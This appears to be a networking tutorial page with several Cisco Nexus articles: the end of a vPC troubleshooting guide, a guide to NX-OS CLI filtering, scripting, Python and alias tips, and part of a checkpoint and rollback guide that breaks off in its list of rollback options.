If the vPC primary switch is alive and the vPC Peer-Link goes down, the vPC secondary switch suspends its vPC member ports to prevent dual active scenario, while the vPC primary switch keeps all of its vPC member ports active. It is recommended for this reason the orphan ports (ports connecting to only one switch) be connected to the vPC primary switch.

Verifying Operation and Troubleshooting the Status of the vPC

The show vpc brief command displays the vPC domain ID, the Peer-Link status, the Keepalive message status, whether the configuration consistency is successful, and whether a peer link has formed. It also states the status of the vPC Port Channel (Po10 in our setup).

N5k-Primary# show vpc brief

Legend:

               (*) - local vPC is down, forwarding via vPC peer-link

vPC domain id                     : 1  

Peer status                       : peer adjacency formed ok    

vPC keep-alive status             : peer is alive                

Configuration consistency status : success

Per-vlan consistency status       : success                      

Type-2 consistency status         : success

vPC role                         : primary, operational secondary

Number of vPCs configured         : 1

Peer Gateway                     : Enabled

Peer gateway excluded VLANs     : -

Dual-active excluded VLANs       : -

Graceful Consistency Check       : Enabled

Auto-recovery status             : Enabled (timeout = 240 seconds)

vPC Peer-link status

---------------------------------------------------------------------

id   Port   Status Active vlans  

--   ----   ------ --------------------------------------------------

1   Po23   up     10                                                      

vPC status

----------------------------------------------------------------------------

id     Port       Status Consistency Reason                     Active vlans

------ ----------- ------ ----------- -------------------------- -----------

10     Po10        up     success     success                   10        

The show vpc consistency-parameters command is useful for troubleshooting and identifying specific parameters that might have caused the consistency check to fail either on the vPC Peer-Link or to the vPC enabled Portchannels:

N5k-Primary# show vpc consistency-parameters global

   Legend:

       Type 1 : vPC will be suspended in case of mismatch

Name                       Type Local Value           Peer Value            

-------------               ---- ---------------------- -----------------------

QoS                         2     ([ ], [ ], [ ], [ ], [ ],   ([ ], [ ], [ ], [ ], [ ],

                                 [ ])                   [ ])                  

Network QoS (MTU)         2     (1538, 0, 0, 0, 0, 0) (1538, 0, 0, 0, 0, 0)

Network Qos (Pause)         2     (F, F, F, F, F, F)     (F, F, F, F, F, F)  

Input Queuing (Bandwidth)   2     (100, 0, 0, 0, 0, 0)   (100, 0, 0, 0, 0, 0)

Input Queuing (Absolute     2     (F, F, F, F, F, F)     (F, F, F, F, F, F)  

Priority)                                                                    

Output Queuing (Bandwidth) 2     (100, 0, 0, 0, 0, 0)   (100, 0, 0, 0, 0, 0)

Output Queuing (Absolute   2     (F, F, F, F, F, F)     (F, F, F, F, F, F)  

Priority)                                                                    

STP Mode                   1     Rapid-PVST             Rapid-PVST          

STP Disabled               1     None                   None                

STP MST Region Name         1     ""                     ""                  

STP MST Region Revision     1     0                     0                    

STP MST Region Instance to 1                                                

VLAN Mapping                                                                

STP Loopguard               1     Disabled               Disabled            

STP Bridge Assurance       1     Enabled               Enabled              

STP Port Type, Edge       1     Normal, Disabled,     Normal, Disabled,    

BPDUFilter, Edge BPDUGuard       Disabled               Disabled            

STP MST Simulate PVST       1     Enabled               Enabled              

IGMP Snooping Group-Limit   2     4000                  4000                

Interface-vlan admin up     2     10                     10                  

Interface-vlan routing     2     10                     10                  

capability                                                                    

Allowed VLANs               -     10                     10                  

Local suspended VLANs       -     -                     -                    

 

N5k-Primary# show vpc consistency-parameters vpc 10

   Legend:

       Type 1 : vPC will be suspended in case of mismatch

Name                       Type Local Value           Peer Value            

-------------               ---- ---------------------- -----------------------

Shut Lan                   1     No                    No                  

STP Port Type               1     Default               Default              

STP Port Guard             1     None                   None                

STP MST Simulate PVST       1     Default               Default              

mode                       1     on                     on                  

Speed                       1     1000 Mb/s             1000 Mb/s            

Duplex                     1     full                   full                

Port Mode                   1     access                 access              

MTU                         1     1500                   1500                

Admin port mode             1     access                 access              

vPC card type               1     Empty                 Empty                

Allowed VLANs               -     10                     10                  

Local suspended VLANs       -     -                     -   

vPC Quiz

Our Nexus 5500 switches used the management interface to establish the vPC keepalive link between them. The management interfaces on both switches are connected to a 2960 Catalyst management switch which was accidently switched off due to an unplanned power disruption, causing the management interface and vPC keepalive link to go down. What is the impact of this failure on the Nexus vPC setup?

Answer:

There will be no service impact to the Nexus infrastructure! Read the vPC failure scenarios section in this article for a thorough explanation.

Summary

In this article we reviewed the Nexus vPC features and vPC design guidelines. In addition we discussed the vPC architecture components and explained the importance of each component.

Next we analyzed different vPC failure scenarios including vPC Peer-Link Failure and Peer Keepalive link failure. We compared vPC with VSS technology developed for the Catalyst Switches in order to provide MEC feature capabilities. Finally, the vPC configuration guide and best practices section showed how to configure vPC and apply optional configuration commands to increase resiliency and reduce disruptions in vPC operations. We also provided useful show commands needed to validate and troubleshoot the status of the vPC.

  • Hits: 506292
NEXUS NX-OS: Useful Commands, CLI Scripting, Hints & Tips, Python Scripting

NEXUS NX-OS: Useful Commands, CLI Scripting, Hints & Tips, Python Scripting and more

cisco nexus configurationWhether you’re new to Cisco Nexus switches or have been working with them for years this article will show how to get around the Nexus NX-OS using smart CLI commands and parameters, create your own commands and more. Learn how to filter show command outputs, efficiently use include | begin | exclude search operators, Turn pagination on/off, redirect output to files, run multiple commands in one CLI line, capture specific keywords from show command output,  create custom CLI commands using alias, execute scripts, introduction of Python environment in the Nexus NX-OS, executing Python scripts and much more!

By the end of this article we’ll agree there’s no doubt the Cisco NX-OS has several interesting commands and powerful scripting capabilities that can improve and facilitate the day-to-day administration of CISCO Nexus network devices.  

While basic knowledge on the Cisco NX-OS, Linux and Python scripting is recommended, it is not mandatory in order to understand the topics covered.

Key Topics:

Additional related articles:

NX-OS Command Output Filtering – Search Operators

cisco nexus cli commands tips tricksThe output from NX-OS show commands can be lengthy and that makes it difficult to find the information we are looking for. The Cisco NX-OS software provides the means to search and filter the output to assist in locating the information we are after. 

Experienced Cisco users will surely be familiar with the IOS (Catalyst) include | begin | exclude search operators which are also offered in the Nexus NX-OS (see below). The NX-OS offers additional searching and filtering options, which follow a pipe character (|) at the end of the show command. This provides amazing flexibility and helps make administration of any Nexus device a great experience. The most “Linux-like” useful options are displayed below:

N5k-UP# show interface brief | ?
<…>
diff  Show difference between current and previous invocation (creates temp files: remove them with 'diff-clean' command and dont use it on commands with big outputs, like 'show tech'!)
egrep  Egrep - print lines matching a pattern
grep  Grep - print lines matching a pattern
less  Filter for paging
no-more  Turn-off pagination for command output
section   Show lines that include the pattern as well as the subsequent lines that are more indented than matching line
sort    Stream Sorter
source   Run a script (python, tcl,...) from bootflash:scripts
vsh   The shell that understands cli command
wc   Count words, lines, characters
xml   Output in xml format (according to .xsd definitions)
begin   Begin with the line that matches
count   Count number of lines
exclude   Exclude lines that match
include   Include lines that match 

Filtering Output From The ‘Show’ Command - ‘Show <command> | grep’ & ‘Show <command>egrep’ Parameters

The grep egrep parameters can be used to filter the show command output for easier to read results.

The example below shows how to filter the show running-config output by specifying the number of lines to display before and after a matched line. The matching variable in our example is the keyword Firewall:

N5k-UP# show running-config | grep prev 1 next 2 Firewall
interface Ethernet1/1
description Firewall – LAN
interface Ethernet1/2
--
interface Ethernet1/4
description Firewall - WAN
interface Ethernet1/5

You can use the less operator to display the contents of the show command output in one page at a time. There are various command options at the ‘:’ prompt. To display all support less command options you enter ‘h’ at the ‘:’ prompt.

An interesting output and useful option is using the show log | less command which Unix/Linux users will welcome as it has the same effect as the tail –f <filename> Linux command. This command will display the last entries of the system’s log and automatically update the display with any new content/log entries inserted. Engineers and admins can now easily troubleshoot problems while continually keeping an eye on the Nexus syslog without the need to use the show log command every minute to get any new updates written to the system’s log:

N5k-UP# show log | less
:F
<…>
2023 May 15 11:59:20 N5k-UP %EEM_ACTION-2-CRIT: SLA-PYTHON-SCRIPT-FOR-8.8.8.8/32-EXECUTED
2023 May 15 11:59:20 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.1115
Waiting for data... (interrupt to abort)

To exit this mode simply type Ctrl-C and then q to abort.

Another useful operator  is  the sort parameter used to filter the show command output in an order as shown below with the Ethernet interfaces. Keep in mind that the command will sort the output based on the character order which means any interface with an Eth1 will show first, then Eth2 and so on.

N5k-UP# show interface brief | sort
Eth1/1 1 eth access down SFP validation failed 10G(D) --
Eth1/10 1 eth access down SFP not inserted 10G(D) --
Eth1/11 1 eth access down SFP not inserted 10G(D) --
Eth1/12 1 eth access down SFP not inserted 10G(D) –
<…>

Turning Off Pagination For Lengthy ‘Show’ Command Outputs. ‘Show <option> | no-more’ Parameter 

The | no-more parameter is particularly useful when there is a need to display all output without stopping at the end of the page. A good example is to show the running-configuration or obtain the output of any command in one hit. By default, the Nexus OS will pause the output once it hits the end of the user’s terminal page. This feature can be easily bypassed by appending the |no-more parameter at the end of the command:

N5k-UP# show interface brief | no-more

Searching & Filtering Output from ‘Show’ Command: ‘Show <option>’–More- 

You can search and filter output from the --More– prompt displayed in the show command output. When the --More— prompt appears (as shown below), simply type h to view all possible options. An interesting feature is to filter the output by typing / (forward-slash) and then to search for the pattern that you are looking for:

N5k-UP# show running-config
!Command: show running-config
!Time: Mon May 15 12:30:09 2023
<…>
--More—
<…>
/<regular expression>

Displaying Last Lines From The ‘Show’ Command Output – ‘Show <option> | last ’

When working with lengthy outputs from commands such as show logging it’s often desirable to display the last lines of the command output. The show <option> | last command will display the last 10 lines by default. Appending a number after the keyword last will adjust the lines displayed. The example below shows the last 5 log entries in our Nexus system:

N5k-UP# show logging | last 5
2023 May 15 12:34:30 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.5669
2023 May 15 12:34:40 N5k-UP %EEM_ACTION-2-CRIT: SLA-PYTHON-SCRIPT-FOR-8.8.8.8/32-EXECUTED
2023 May 15 12:34:40 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.5691
2023 May 15 12:34:50 N5k-UP %EEM_ACTION-2-CRIT: SLA-PYTHON-SCRIPT-FOR-8.8.8.8/32-EXECUTED
2023 May 15 12:34:50 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.5709

Redirecting ‘Show Command’ Output to File with or without Timestamp. ‘Show running-config>backupcfg.$(TIMESTAMP) ‘

The ability to redirect the output of a command to a file is a feature most Linux users/administrators will welcome. Capturing lengthy outputs from commands such as show tech-support can become quite challenging as these can sometime be over 10,000 lines. Redirecting the output of a command to a file is a very simple process making it easy to execute even by less experienced users.

The command below shows how to redirect the output of the show running-config command to a file on the system’s flash:

N5k-UP# show running-config > backupcfg
N5k-UP# dir | include backup
4352 May 15 13:30:00 2023 backupcfg

When adding the System-Defined Timestamp Variable into the command line the Nexus OS will automatically append the time and date to the filename making it easier to store and track files. The next example redirects the show running-config output to a file that includes the system’s timestamp:

N5k-UP# show running-config> backupcfg.$(TIMESTAMP)
N5k-UP# dir | include backup
4352 May 15 13:30:00 2023 backupcfg
4352 May 15 13:46:17 2023 backupcfg.2023-05-15-13.46.17

Combining Multiple Search Strings – ‘| Include’ Parameter

Sometimes, it is necessary to combine search strings from the show command to filter the output and quickly obtain the information we need. The | include parameter is frequently used to filter the output and display lines containing specific keywords.

The next command will show the configured descriptions from all interfaces and include the interface utilization which is captured by the rate keyword:

N5k-UP# show interface | include description | rate
PH_NEXUS_7000# show interface | incdescription|rate
1 minute input rate 0 bits/sec, 0 packets/sec
1 minute output rate 0 bits/sec, 0 packets/sec
30 seconds input rate 56 bits/sec, 0 packets/sec
30 seconds output rate 896 bits/sec, 1 packets/sec
input rate 56 bps, 0 pps; output rate 896 bps, 1 pps
300 seconds input rate 112 bits/sec, 0 packets/sec
300 seconds output rate 488 bits/sec, 1 packets/sec
input rate 112 bps, 0 pps; output rate 488 bps, 1 pps
30 seconds input rate 120 bits/sec, 0 packets/sec
30 seconds output rate 1072 bits/sec, 1 packets/sec
..<output omitted>

All search strings are case sensitive and there is no space between the last pipe and keywords (description|rate).

Next example command is equivalent to the OR option for a filter.

N5k-UP# show run | include 'interface Vlan|ip address'
iptacacs source-interface Vlan1
source-interface Vlan1
ip address 10.1.1.101/24
interface Vlan1
ip address 192.168.250.247/24
interface Vlan4
ip address 192.168.4.247/24
interface Vlan7
ip address 172.20.199.247/24
interface Vlan11
interface Vlan25
ip address 192.168.25.247/24
interface Vlan26
ip address 172.26.1.251/24
interface Vlan27
ip address 172.27.1.250/24
interface Vlan60
interface Vlan100
ip address 172.20.100.247/24
interface Vlan105
ip address 172.20.105.247/24
interface Vlan109
ip address 172.20.109.247/24
interface Vlan110
ip address 172.20.110.247/24

Finally the last example is used when there is a need to use more than one word to filter specific keywords/patterns. The search strings should be included between apostrophes as shown below:

N5k-UP# show running-config | include 'ip route'
ip route 0.0.0.0/0 192.168.245.245
ip route 0.0.0.0/0 192.168.231.4
ip route 0.0.0.0/0 172.26.1.250
ip route 0.0.0.0/0 10.1.1.1

Scripting in NX-OS – Executing Multiple Commands within a File

Automating time-consuming tasks such as configuring multiple interfaces or changing large portions of a configuration is easily achieved thanks to the flexibility the NX-OS provides.

Here are a few examples where automated scripts can be used to help speed up troubleshooting or even resolve problems:

  • Temporarily change the running configuration, obtain debugs and then roll back the change
  • Have a series of commands ready to be executed when specific events occur e.g. link failure or switch becomes unresponsive
  • Execute commands on the Nexus after the switch is deployed at a remote location
  • Periodically obtain information from the Nexus switch using show commands.

The possibilities and combinations are really limitless.

Unfortunately the script containing the commands cannot be created within NX-OS. The script needs to be created on a workstation using a standard text editor and then uploaded to the Nexus switch bootflash.

Uploading the file to the Nexus bootflash is achieved using the copy tftp: bootflash: command. This assumes there is already a tftp server configured, operating and serving the script:

N5k-UP# copy tftp: bootflash:
Enter source filename: nexus-script.txt
Enter vrf (If no input, current vrf 'default' is considered): management
Enter hostname for the tftp server: 10.10.8.176
Trying to connect to tftp server......
Connection to Server Established.
TFTP get operation was successful
Copy complete, now saving to disk (please wait)...

N5k-UP# dir | include nexus
179 May 15 00:03:12 2023 nexus-script.txt
N5k-UP#

The script’s content can be viewed using the show file command as displayed below:

N5k-UP# show file bootflash:///nexus-script.txt
Configure terminal
interface Ethernet1/6
description *** TEST 1 ***
no shutdown
interface Ethernet1/7
description *** TEST 2 ***
no shutdown
interface Ethernet1/8
description *** TEST 3 ***
no shutdown
end

As we can see, the script contains commands that will configure the description on 3 Ethernet interfaces and place them in an administratively up status (no shutdown).  Currently these interfaces do not have any configuration:

N5k-UP# show run interface
!Command: show running-config interface
!Time: Mon May 15 00:00:41 2023
version 7.0(2)N1(1)
<…>
interface Ethernet1/6
interface Ethernet1/7
interface Ethernet1/8

Executing our script can be easily done using the run-script command. The run-script command is used to execute the commands specified in a file:

N5k-UP# run-script bootflash:///nexus-script.txt
`configure terminal
`interface Ethernet1/6
`description *** TEST 1 ***
`no shutdown
`interface Ethernet1/7
`description *** TEST 2 ***
`no shutdown

`interface Ethernet1/8
`description *** TEST 3 ***
`no shutdown
`end

Once the script is executed we can check the running-configuration and verify interfaces have been successfully configured:

N5k-UP# show running-config interface
!Command: show running-config interface
!Time: Mon May 15 00:04:04 2023
version 7.0(2)N1(1)
<output omitted>..
interface Ethernet1/6
description *** TEST 1 ***
no shutdown
interface Ethernet1/7
description *** TEST 2 ***
no shutdown
interface Ethernet1/8
description *** TEST 3 ***
no shutdown

Another option is to use the vsh command and run commands directly. The vsh stands for virtual shell and is mainly used to run NX-OS cli commands from Bash Shell however, we can still run the same script but this time by taking advantage of the vsh command.

The vsh command is executed on a clean configuration and the interface descriptions are successfully configured:

N5k-UP# show file script-description2.txt | vsh

N5k-UP# show run interface
!Command: show running-config interface
!Time: Mon May 15 10:49:16 2023
<…>
interface Ethernet1/6
description *** TEST 1 ***
interface Ethernet1/7
description *** TEST 2 ***
interface Ethernet1/8
description *** TEST 3 ***

There is also the option to execute commands directly as illustrated in the following example.

N5k-UP# echo "hostname TEST-VSH" | vsh
TEST-VSH#

Introducing Python in the Nexus NX-OS – Uploading and Executing Python Scripts

cisco nexus python scriptingNexus switches offer powerful scripting capabilities since integrating Python into NX-OS and can simplify network operations through the ability to run Python scripts directly on the switch. Python is a powerful programming language with a simple approach to object-oriented programming. The Cisco Nexus 5000 series switches with Releases 5.2(1)N1(1) and later and the Cisco Nexus 6000 series switches with Releases 6.0(2)N1(1) and later, support all the features available in Python v2.7.2. The Cisco Nexus 7000 series also support Python v2.7.2 and the Cisco Nexus 9000 Series devices support Python v2.7.5. The python scripts can be used to execute configuration commandsshow commands, parse CLI output, call other scripts etc. 

To enter the python environment on the Nexus NX-OS use the python command. Once in the python environment the hash (#) command prompt will be replaced by three greater-than signs (>>>). At this point we are able to directly execute python commands and scripts.

N5k-UP# python
Copyright (c) 2001-2012 Python Software Foundation; All Rights Reserved
N5k-UP# >>>

The integrated python in NX-OS supports both interactive and non-interactive modes. Python commands in interactive mode can be executed after switching to the python environment. The next interactive mode example illustrates how to print the old time classic in the programming world, “hello world” output, directly from the NX-OS python environment. 

N5k-UP# python
Copyright (c) 2001-2012 Python Software Foundation; All Rights Reserved

N5k-UP# >>>print "hello world"
hello world
N5k-UP# >>> exit()
N5k-UP# 

Note: The following commands can be used to exit the python environment and switch back to NX-OS privileged mode (#): quit(), exit (), Ctrl-C or Ctrl-D (i.e. EOF)

Pythonin NX-OS can run also in non-interactive (script) mode by running the Python script name as an argument to the Python CLI command.

For demonstration purposes we’ve created a simple python script named helloPython.py. This script has been created using a standard text editor, e.g. Notepad from the Windows OS, and has been uploaded to a TFTP server. The script has been downloaded to the Nexus switch and stored in the bootflash:scripts location which is where pythons scripts must be stored and executed. The content of our Python script is shown below:

N5k-UP# show file bootflash:scripts/helloPython.py
#!/usr/bin/env python
import sys
argvList = sys.argv[1:]
forargv in argvList:
print 'Hello ' + argv 

Executing Python Scripts

The python script is executed using the source <filename> command followed by the necessary parameters the script is expecting. A variable (argv)  is expected to be received as input to the script. This variable (firewall.cx) is printed along with the word “Hello” at the beginning of the output.

N5k-UP# source helloPython.py firewall.cx
Hello firewall.cx

NOTE: Before the NX-OS 7.0 version, python scripts are executed with the ‘python’ instead of the ‘source’ command.

Finally, you can create your own NX-OS commands by taking advantage of the python scripting. A new command named hello has been configured, using the cli alias command, which executes our Python script along with the necessary parameters:

N5k-UP(config)# cli alias name hello source helloPython.py
N5k-UP(config)# hello Vasilis
Hello Vasilis

The cli alias command above instructs the NX-OS to create a new command named hello which, when executed, will run in its turn the command “source helloPython.py” but also accept any parameters given (for our Python script). The cli alias command is covered extensively later in this article.

Nexus NX-OS Hints & Tips

Working with the Nexus NX-OS is a pleasant experience considering the similarities with the Linux operating system. Unix/Linux users will surely feel right at home. To further enhance user experience we’ve written the top 5 NX-OS handy commands section below that could be useful for the day to day operation and administration of Nexus switches. Let’s start the countdown... 

Nexus NX-OS Tip No.5 – Executing Multiple Commands in One Line

The Nexus NX-OS allows the execution of multiple show or configuration commands in one go using the semi-colon ; character  between them:

N5k-UP# show clock ; show checkpoint summary ; show hostname ;
12:56:57.370 UTC Mon May 15 2023
User Checkpoint Summary
--------------------------------------------------------------------------------
1) FIRST-Checkpoint:
Created by admin
Created at Wed, 16:13:19 10 May 2023
Size is 15,831 bytes
Description: None
2) SLA:
Created by admin
Created at Sun, 14:21:06 14 May 2023
Size is 16,183 bytes
Description: PYTHON-SCRIPT
N5k-UP

N5k-UP# configure terminal ; interface eth1/6 ; description *** test multiple commands *** ;
Enter configuration commands, one per line. End with CNTL/Z.
N5k-UP(config-if)# show run interface ethernet 1/6
!Command: show running-config interface Ethernet1/6
!Time: Mon May 15 12:58:46 2023
version 7.0(2)N1(1)
interface Ethernet1/6
description *** test multiple commands *** ;

Nexus NX-OS Tip No.4 – Tracking Recent User Configuration Changes

All commands executed within the Nexus NX-OS are logged by default. You can easily find who modified the configuration and when, as well as the exact commands that have been applied using the show accounting log command:

N5k-UP(config-if)# show accounting log | last 3
Mon May 15 13:05:12 2023:type=update:id=10.10.8.174@pts/2:user=admin:cmd=configure terminal ; interface Ethernet1/6 ; description test (REDIRECT))
Mon May 15 13:05:12 2023:type=update:id=10.10.8.174@pts/2:user=admin:cmd=configure terminal ; interface Ethernet1/6 ; description test (SUCCESS)
Mon May 15 13:05:16 2023:type=start:id=vsh.9446:user=admin:cmd=

The | last 3 parameter will display the last 3 entries. 

Nexus NX-OS Tip No.3 – Creating Your Own NX-OS Alias Commands

Creating your own NX-OS alias commands is a great feature which helps simplify long and tedious commands. Cisco IOS users can also use the cli alias command to create IOS equivalent commands. For example we can create an alias copy running-config startup-config command and save it as wr to help other users with more experience on Cisco IOS devices work more easily around the Nexus switch.

Several useful examples are provided below:

N5k-UP(config)# cli alias name ipb show ip interface brief
N5k-UP(config)# cli alias name is show interface status
N5k-UP(config)# cli alias name hb show hsrp brief
N5k-UP(config)# cli alias name ps show port-channel summary
N5k-UP(config)# cli alias name wr copy running-config startup-config

N5k-UP(config)# wr
[########################################] 100%
Copy complete, now saving to disk (please wait)...

Nexus NX-OS Tip No.2 – Quickly Viewing and Executing Past Commands

The Nexus NX-OS allows users to easily view and recall past commands with the use of the show cli history command. When entered, the switch will list commands entered from the oldest to the most recent (indicated by the number on the left) along with the date/time executed. The switch will execute the selected command by using the exclamation mark (!) and the number of the command line.

In the example below we selected command No.9 from the history list by entering !9

N5k-UP# show cli history
0 13:18:30 conf
<output omitted>
8 13:20:59 cli alias name id show interface description
9 13:21:04 show run | include alias
10 13:23:06 show cli alias

N5k-UP# !9
N5k-UP# show run | include alias
cli alias name sla source routetrack-1.3.py 8.8.8.8/32 management 10.10.8.176
cli alias name hello source helloPython.py
cli alias name ipb show ip interface brief
cli alias name is show interface status
cli alias name hb show hsrp brief
cli alias name ps show port-channel summary
cli alias name wr copy running-config startup-config
N5k-UP#

Nexus NX-OS Tip No.1 – Comparing Differences in Running & Startup Configuration 

You can compare the output from a show command with the output from the previous snapshot of the same command. In particular, the Cisco NX-OS software creates temporary files for the most current output “show command” for all current and previous users’ sessions.

The “show run diff” command can be used to display the difference between running and startup configuration.  The section starting with *** (stars) refers to the Startup-config while the section under --- (dashes) refers to the Running-config.

Note: The switch will not show any differences to the configuration after it is saved

N5k-UP# show run diff
*** Startup-config
--- Running-config
***************

*** 46,56 ****
interface Ethernet1/2
interface Ethernet1/3
interface Ethernet1/4
! description GREP2
interface Ethernet1/5
interface Ethernet1/6
description test

--- 45,55 ----
interface Ethernet1/2
interface Ethernet1/3
interface Ethernet1/4
! description *** TEST DIFF ***
interface Ethernet1/5
interface Ethernet1/6

N5k-UP# wr
[########################################] 100%
Copy complete, now saving to disk (please wait)...
N5k-UP# show run diff
N5k-UP#

The diff-clean command can be used to remove the temporary files for the current user's active session or for all past and present sessions for all users.

N5k-UP# diff-clean all-sessions
N5k-UP#

Summary

The Cisco NX-OS Software is a data center-class operating system with powerful scripting capabilities. This article showed how to make use of various Nexus NX-OS command options and operators, how to combine multiple Nexus commands, filter Show commands output, create and execute NX-OS scripts, introduced Python scripting and environment and covered a number of Nexus NX-OS hints and tips to help administrators and engineers make their day-to-day operation and administration of the Nexus Data Center switches faster, easier and safer!

  • Hits: 191209
Complete Guide to Nexus Checkpoint & Rollback Feature

Complete Guide to Nexus Checkpoint & Rollback Feature. Fast Recovery from Nexus Misconfiguration. Nexus 9000, 7000, 5000, 3000

cisco nexus configuration checkpoint rollbackThe Cisco NX-OS checkpoint feature provides the capability to capture at any time a snapshot (backup) of the Cisco Nexus configuration before making any changes. The captured configuration (checkpoint) can then be used to roll back and restore the original configuration.

The NX-OS checkpoint and rollback feature is extremely useful, and a life saver in some cases, when a new configuration change to a production system has caused unwanted effects or was incorrectly made/planned and we need to immediately return to an original/stable configuration.

With Catalyst IOS switches we would manually remove or restore IOS commands but with the Nexus NS-OS checkpoint-rollback feature this is a much faster and safer process that can be executed even by an authorized user with basic experience/knowledge on Nexus switches.

Key Topics:

Finally, we must point out that basic knowledge of the Cisco NX-OS is required for this article.

Additional Reading:

NX-OS Checkpoint & Rollback Limitations - Guidelines

The Checkpoint and Rollback feature has the following main configuration guidelines and limitations:

  • The maximum number of checkpoints supported is equal to ten (10).
  • Checkpoints are stored in an internal repository not accessible by the common user.
  • Checkpoints are persistent and synced between redundant supervisors.
  • It is not possible to apply or import the checkpoint file from another Nexus switch. Checkpoints can only be used on the device they were created on.
  • Only one user at a time can perform a checkpoint, rollback, or copy of the running configuration to the startup configuration.
  • Checkpoints are cleared from the system’s database after executing the write erase or reload command (switch reload).
  • Checkpoints can be manually cleared by running the clear checkpoint database command. The checkpoints saved to the bootflash are not affected by the aforementioned commands.
  • Checkpoints are only local to the NX-OS switch.
  • Rollback using files stored in bootflash is supported only if it has been created using the checkpoint command.
  • Checkpoint names must be unique. You cannot overwrite previously saved checkpoints. If attempting to overwrite existing checkpoints the user will receive the following error: ERROR: ascii-cfg: Checkpoint Name already exists (err id 0x405F002B)
  • Checkpoints are local to a virtual device context (VDC) for the Nexus 7000.
  • Rollback is not supported in the storage VDC for the Nexus 7000
  • Rollback is not supported on the Nexus 5000 after enabling the FCoE feature. System will generate the following error after enabling the FCoE feature: ERROR: FCOE is enabled. Disabling rollback module.

Understanding and Configuring the NX-OS Checkpoint Feature

Working with the Nexus Checkpoint feature is a very easy process and the commands used follow a logical order allowing the easy usage of this fantastic feature.

It’s important to always create a checkpoint before you begin making changes to the existing configuration of your Nexus switch. The command below shows the creation of our first checkpoint named Checkpoint-1 along with the optional description parameter (max 80 characters) allowing the easy identification of the checkpoint:

N5k-UP(config)# checkpoint Checkpoint-1 description *** Testing the checkpoint feature ***
.....Done

Once the checkpoint has been created, we can easily confirm its creation and details by issuing the show checkpoint summary command as shown below:

N5k-UP(config)# show checkpoint summary
User Checkpoint Summary
--------------------------------------------------------------------------------
1) Checkpoint-1:
Created by admin
Created at Mon, 08:10:29 22 May2023
Size is 15,568 bytes
Description: *** Testing the checkpoint feature ***

Note how the system not only provides all the necessary details about the recently created checkpoint but also shows which system user created it (admin). This detail is particularly important if the system is managed by multiple admins or engineers.

The NX-OS checkpoint feature doesn’t stop surprising thanks to the system’s intelligent features. Users can actually configure their Nexus switch to automatically generate checkpoints when specific changes occur in its running configuration. This awesome capability minimizes the risk for network downtime due to NX-OS key features misconfigurations and helps ensure there is always a valid snapshot that we can rollback to in case someone forgot to create a checkpoint before applying their changes!

Further capabilities built into this great feature allow the system to automatically create a checkpoint when aconfigured expiration period, e.g. the 120 days trial grace period of a license, has been exceeded. Reasons that could trigger automated system checkpoints are highlighted below: 

  • License expiration of a feature
  • Disabling a feature with the no feature command
  • Removing an instance of a Layer 3 protocol

The system-generated checkpoint name convention has the format system-fm-feature. To help illustrate this automated feature we attempted to disable the VRRP feature on our Nexus 5000 therefore triggering the system to create a checkpoint. First we confirm the VRRP feature is enabled by issuing the show feature | include vrrp command then disable it and then verify it has been disabled:

N5k-UP(config)# show feature | include vrrp
vrrp 1 enabled
N5k-UP(config)# no feature vrrp

vrrp 1 disabled

N5k-UP# show checkpoint summary
User Checkpoint Summary
--------------------------------------------------------------------------------
1) Checkpoint-1:
Created by admin
Created at Mon, 08:10:29 22 May2023
Size is 15,568 bytes
Description: *** Testing the checkpoint feature ***
System Checkpoint Summary
--------------------------------------------------------------------------------
2) system-fm-vrrp:
Created by admin
Created at Mon, 11:31:41 22 May2023
Size is 15,581 bytes
Description: Created by Feature Manager.

Notice that the system now shows a second checkpoint system-fm-vrrp which did not previously exist. This second checkpoint was created automatically by the Nexus as soon as we disabled the vrrp feature.

Multiple checkpoints can be created to save different versions of the running configuration, however as previously noted, there is a limit of ten (10) checkpoints a user can create. When this limit is reached a warning message to overwrite the oldest checkpoint is shown:

N5k-UP# checkpoint Checkpoint-11
Checkpoints limit reached, this will overwrite the oldest checkpoint,
Continue? (y/n) [n]

How to Backup Nexus Checkpoints – Exceeding The 10 Checkpoint Limit 

Those who require the ability to store more than 10 checkpoints can store checkpoint files in the bootflash (internal compact flash memory). This is a useful methodology to safely store checkpoint files as they won’t be erased with the write erase command or reboot of the Nexus switch.

To store the checkpoint to the bootflash simple use the checkpoint file bootflash: command and append the name to be used for the checkpoint file:

N5k-UP# checkpoint file bootflash:Checkpoint-11
.Done
N5k-UP# dir | grep 11
15568 May 22 11:54:53 2023 Checkpoint-11

The user and system checkpoint database can be manually cleared using the clear checkpoint database command. However, the checkpoint files stored at the bootflash are not affected by the clear checkpoint database command as displayed below:

N5k-UP# clear checkpoint database
...Done
N5k-UP# show checkpoint summary
N5k-UP#
N5k-UP# dir | grep 11
          15568 May22 11:54:53 2023 Checkpoint-11

Rollback Configuration – Checking Differences Between ‘Running Config’ & ‘CheckPoint’

The rollback feature allows us to apply a checkpoint backup configuration of the Cisco NX-OS switch at any point without having to reload the switch. When executed, rollback will compare the running-configuration with the checkpoint and make the necessary changes to the running configuration so that they become identical. Network-admin user privileges are required to configure rollback.

To test the rollback feature on our Nexus 5000 we created a checkpoint (Checkpoint-1) and configured a description for interfaces E1/10-E1/14. We then will attempt to rollback to the initial checkpoint created (Checkpoint-1) which should remove the descriptions from interfaces E1/10-E1/14:

N5k-UP(config)# interface ethernet 1/10-14
N5k-UP(config-if-range)# description *** TESTING CHECKPOINT FEATURE ***

We can review the differences between the running-config and a checkpoint before applying the rollback command by executing the show diff command. It is always recommended to use the show diff command and review the configuration changes before applying the checkpoint configuration file:

N5k-UP(config)# show diff rollback-patch running-config checkpoint Checkpoint-1
Collecting Running-Config
#Generating Rollback Patch
!!
interface Ethernet1/14
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/13
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/12
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/11
no description *** TESTING CHECKPOINT FEATURE ***
exit
interface Ethernet1/10
no description *** TESTING CHECKPOINT FEATURE ***
exit

The next rollback command options are provided for the Nexus 5000, Nexus 7000 and Nexus 9000 Series:

  • Atomic: This is the default rollback type and applies the rollback file only if no errors occur
  • Verbose: This option displays the execution log and allows the user to see the applied configuration

